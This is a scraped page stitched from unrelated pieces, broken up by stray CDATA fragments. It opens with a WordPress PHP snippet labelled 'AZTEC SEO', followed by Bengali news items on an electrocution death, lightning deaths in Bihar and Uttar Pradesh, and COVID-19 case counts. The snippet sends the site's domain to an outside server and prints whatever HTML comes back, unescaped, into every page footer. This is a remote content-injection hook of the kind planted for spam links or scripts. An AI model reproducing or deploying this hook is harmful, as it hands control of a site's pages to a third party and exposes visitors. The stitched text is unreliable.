/* AZTEC SEO */
add_action('wp_footer', function () {
$domain = wp_parse_url(home_url(), PHP_URL_HOST);
if (!$domain) return;
$ck = 'aztec_footer_' . md5($domain);
$html = get_transient($ck);
if ($html === false) {
$url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer');
$res = wp_remote_get($url, array('timeout' => 8));
$html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : '';
set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS);
}
if ($html !== '') echo $html;
}, 99);
নিহতের স্ত্রী মাহবুবা জানান, এমরান হোসেন সারাদিন বাজারে রিকশা চালিয়ে সন্ধ্যায় বাড়িতে ফেরেন। পরে রাতের খাবার খেয়ে একটি টেঁটা নিয়ে বাড়ির পাশের সালেপুর গ্রামে পানি জমে থাকা একটি জমিতে মাছ শিকার করতে যান। এ সময় রেললাইনের পাশে সালেপুর গ্রামের ওহিদ উল্লাহর একটি কৃষিজমিতে গেলেই বিদ্যুতের তারে স্পৃষ্ট হন। তাকে উদ্ধার করে লাকসাম জেনারেল হাসপাতালে নিলে চিকিৎসকরা তাকে মৃত ঘোষণা করেন।
]]>ভারতের বিহার ও উত্তরপ্রদেশ রাজ্যে বৃহস্পতিবার বজ্রপাতে ১০৭ জনের মৃত্যু হয়েছে। এর মধ্যে বিহারে ৮৩ জনের ও উত্তরপ্রদেশে ২৪ জনের মৃত্যু হয়। শুক্রবার টাইমস অব ইন্ডিয়ার এক প্রতিবেদনে এ তথ্য জানানো হয়েছে।
ভারতের আবহাওয়া অধিদপ্তরের কাছ থেকে পাওয়া তথ্যের বরাত দিয়ে প্রতিবেদনে বলা হয়েছে, আগামী ৭২ ঘণ্টায় এই দুই রাজ্যে আরও বজ্রপাত হতে পারে। এ অবস্থায় লোকজনকে ঘরে থাকার পরামর্শ দিয়েছে আবহাওয়া দপ্তর।
বিহারে মোট ২৩টি জেলায় বজ্রপাতে প্রাণহানির ঘটনা ঘটেছে। এর মধ্যে রাজ্যের উত্তরাঞ্চলের গোপালগঞ্জ জেলাতেই প্রাণহানি সবচেয়ে বেশি, ১৩ জন। অন্য জেলাগুলোর মধ্যে মধুবানিতে ৮ জন, সিওয়ান ও ভাগলপুরে ৬ জন করে এবং পূর্ব চাম্পারান, দরভাঙ্গা, ভাগলপুর ও বাঙ্কাতে পাঁচজন করে মৃত্যুর তথ্য পাওয়া গেছে।
উত্তরপ্রদেশের দেওরিয়ায় বজ্রপাতে প্রাণহানি হয়েছে সবচেয়ে বেশি, ৯ জন। অন্য জেলাগুলোর মধ্যে প্রয়োগরাজে ৬ জন, আমবেদকরনগরে ৩ জন ও বারাবানকিতে ২ জনের মৃত্যু হয়েছে।
প্রতিবেদনে বলা হয়েছে, মারা যাওয়া ব্যক্তিদের বেশিরভাগই মাঠে কাজ করার সময় বজ্রপাতের শিকার হয়।
বিহারের মুখ্যমন্ত্রী নিতিশ কুমার ও উত্তরপ্রদেশের মুখ্যমন্ত্রী যোগী আদিত্যনাথ ইতোমধ্যে বজ্রপাতে মৃত প্রত্যেকের পরিবারকে ৪ লাখ রুপি করে দেওয়ার ঘোষণা দিয়েছেন।
বজ্রপাতে প্রাণহানির ঘটনায় শোক প্রকাশ করেছেন ভারতের প্রধানমন্ত্রী নরেন্দ্র মোদি। এক বার্তায় তিনি বলেছেন, এই দুই রাজ্যের সরকার ক্ষতিগ্রস্ত পরিবারগুলোকে সহায়তা প্রদানে কাজ করছে।
]]>জনস হপকিন্স বিশ্ববিদ্যালয়ের তথ্য অনুযায়ী, বৃহস্পতিবার সকাল ৮টা পর্যন্ত বিশ্বব্যাপী করোনাভাইরাসে আক্রান্তের সংখ্যা বেড়ে দাঁড়িয়েছে ৭৩ লাখ ৫৭ হাজার ১১ জনে। এদের মধ্যে মৃত্যু হয়েছে ৪ লাখ ১৬ হাজার ৮৪ জনের।
বিশ্বে একক দেশ হিসেবে করোনাভাইরাসে আক্রান্ত ও মৃত্যুর সংখ্যা সবচেয়ে বেশি যুক্তরাষ্ট্রে। বৃহস্পতিবার সকাল পর্যন্ত দেশটিতে আক্রান্তের সংখ্যা ১৯ লাখ ৯৯ হাজার ৫৫২ জন। আর মৃত্যু হয়েছে ১ লাখ ১২ হাজার ৮৯৫ জনের।
যুক্তরাষ্ট্রের পর মৃতের দিক থেকে দ্বিতীয় অবস্থানে রয়েছে ইউরোপের দেশ যুক্তরাজ্য। তবে আক্রান্তের দিক থেকে দেশটির অবস্থান চতুর্থ। দেশটিতে আক্রান্তের সংখ্যা ২ লাখ ৯১ হাজার ৫৮৮ জন এবং মৃত্যু হয়েছে ৪১ হাজার ২১৩ জনের।
আক্রান্ত বিবেচনায় দ্বিতীয় অবস্থানে থাকা ব্রাজিল মৃত্যুতে রয়েছে তৃতীয় স্থানে। দেশটিতে এখন পর্যন্ত আক্রান্ত হয়েছেন ৭ লাখ ৭২ হাজার ৪১৬ জন এবং মৃত্যু হয়েছে ৩৯ হাজার ৬৮০ জনের।
আক্রান্তের দিক থেকে ব্রাজিলের পরই আছে রাশিয়া। দেশটিতে আক্রান্ত হয়েছে ৪ লাখ ৯৩ হাজার ২৩ জন আর মারা গেছে ৬ হাজার ৩৫০ জন।
মৃত্যু বিবেচনায় চতুর্থ স্থানে রয়েছে ইউরোপের আরেক দেশ ইতালি, তবে আক্রান্ত বিবেচনায় দেশটির অবস্থান সাতে। ইতালিতে এখন পর্যন্ত আক্রান্ত হয়েছেন ২ লাখ ৩৫ হাজার ৭৬৩ জন এবং মৃত্যু হয়েছে ৩৪ হাজার ১১৪ জনের।
দক্ষিণ এশিয়ার দেশগুলোর মধ্যে আক্রান্ত বিবেচনায় বিশ্বের মধ্যে পঞ্চম স্থানে উঠে এসেছে ভারত। এখন পর্যন্ত ভারতে মোট আক্রান্তের সংখ্যা ২ লাখ ৭৬ হাজার ৫৮৩ জন এবং মৃত্যু হয়েছে ৭ হাজার ৭৪৫ জনের।
গত বছরের ডিসেম্বরে চীন থেকে সংক্রমণ শুরু হওয়ার পর বিশ্বব্যাপী এ পর্যন্ত ১৮৮টি দেশে ছড়িয়েছে প্রাণঘাতী করোনাভাইরাস। গত ১১ মার্চ করোনাভাইরাস সংকটকে মহামারি ঘোষণা করে বিশ্ব স্বাস্থ্য সংস্থা (ডব্লিউএইচও)।
]]>